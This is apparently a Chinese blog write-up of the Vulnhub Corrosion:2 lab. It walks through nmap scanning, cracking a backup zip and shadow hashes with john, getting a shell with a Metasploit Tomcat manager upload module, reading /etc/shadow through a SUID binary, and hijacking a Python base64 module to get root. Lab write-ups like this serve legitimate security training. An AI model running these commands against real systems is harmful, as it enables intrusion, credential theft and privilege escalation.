首页 > 其他分享 >Vulnhub: Corrosion:2靶机

Vulnhub: Corrosion:2靶机

时间:2023-06-23 15:45:25浏览次数:39  
标签:Corrosion tomcat 提权 base64 192.168 密码 set Vulnhub 靶机

kali:192.168.111.111

靶机:192.168.111.131

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.131

image

通过nmap脚本枚举出8080端口存在backup.zip文件,下载后解压发现需要密码,利用john爆破压缩包密码

image

得到密码:@administrator_hi5

zip2john backup.zip > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

image

image

解压后查看tomcat-users.xml得到tomcat后台账号密码

image

image

利用msf模块exploit/multi/http/tomcat_mgr_upload拿shell

msfdb run
use exploit/multi/http/tomcat_mgr_upload
set rport 8080
set rhosts 192.168.111.131
set httpusername admin
set httppassword melehifokivai
set FingerprintCheck false
run

image

提权

利用之前得到的密码:melehifokivai,切换到jaye用户

image

查找suid权限的文件

find / -perm -u=s -exec ls -al {} \; 2> /dev/null

image

利用该程序可以读取任意文件:https://gtfobins.github.io/gtfobins/look/#suid

image

查看目标/etc/shadow文件

./look '' "/etc/shadow"

image

利用john爆破randy用户密码密文,得到密码:07051986randy

image

切换到randy用户后查看sudo权限

image

查看randombase64.py发现引入base64模块,修改base64模块提权

image

查找base64模块位置

image

在文件最后加上提权代码

import os
os.system("/bin/bash")

image

之后执行该脚本提升为root

sudo -u root /usr/bin/python3.8 /home/randy/randombase64.py

image

标签:Corrosion,tomcat,提权,base64,192.168,密码,set,Vulnhub,靶机
From: https://www.cnblogs.com/ctostm/p/17499215.html

相关文章

  • Vulnhub之Cengbox 2靶机详细测试过程(利用不同的方法提权)
    Cengbox2识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Cengbox2]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts......
  • vulnhub靶场:matrix-breakout-2-morpheus
    这个靶场的链接不小心给关闭了,所以只能自己去搜了,好像这个靶场需要用virtualbox,但是我的好像有问题,所以用VMware了,这是我打开后的样子我的kali的ip:192.168.13.129对靶场进项扫描nmap-sP65535192.168.13.0/24稍微判断下,锁定在147和254然后扫描它,发现147是靶场的ip  ......
  • Vulnhub: Corrosion靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.130目录爆破blog-post目录下存在两个目录对archives目录中的randylogs.php进行测试发现存在文件包含wfuzz-c-w/opt/zidian/SecLists-2022.2/Di......
  • 渗透笔记:vulnhub靶机drippingblues--第一篇测试记录
    在不知道靶场的ip情况下进行扫描 出现有几个ip,但是不知道哪个是的,所以就一个个试一试namp-T4-sV-A-O-p- 192.168.13.143-T4(速度) -sV(版本扫描和开启的服务) -O(操作系统) -p-(所有端口)扫了好几个,只有一个是的,所以不是的就没有发出来了 ftp一下ip,发现有一......
  • Vulnhub: ICA:1靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.130访问目标80,发现目标CMS为qdPM9.2搜索对应漏洞发现存在信息泄露searchsploitqdpm访问192.168.111.130/core/config/databases.yml得到目标......
  • 靶机2020web隐藏信息探索
     个人感觉这套做题法是非常快的,本文可能有点啰嗦,请各位务必耐心看完,相信看完的各位一定会有所学成! #绿色字体代表解析,红色字体是答案,橙色代表方法一,通过本地PC中渗透测试平台Kali对服务器场景Web20200529中的网站进行访问,找到登录界面中的FLAG,并将FLAG提交直接在url里面输入靶机I......
  • VulnHub-Bob: 1.0.1
    靶机地址:https://www.vulnhub.com/entry/bob-101,226/目标:YourGoalistogettheflagin/提示:Remembertolookforhiddeninfo/files一、信息收集1、主机及服务发现1.1主机扫描使用arp-scan确定目标靶机(192.168.0.10)arp-scan-l┌──(root㉿kali)-[~]└─#......
  • Vulnhub之Connect The Dots靶机详细测试过程
    ConnectTheDots识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|ScreenView:UniqueHosts......
  • Vulnhub: Mission-Pumpkin v1.0: PumpkinGarden靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.130在1515网站的img目录下的hidden_secret/目录中存在clue.txtbase64解密后得到scarecrow:5Qn@$y使用用户:scarecrow,密码:5Qn@$y,登录目标sshsshs......
  • Vulnhub: HA: ISRO靶机
    kali:192.168.111.111靶机:192.168.111.134信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.134目录爆破,发现存在connect.phpferoxbuster-k-d1--urlhttp://192.168.111.134-w/opt/zidian/SecLists-2022.2/Discovery/Web-Content/directo......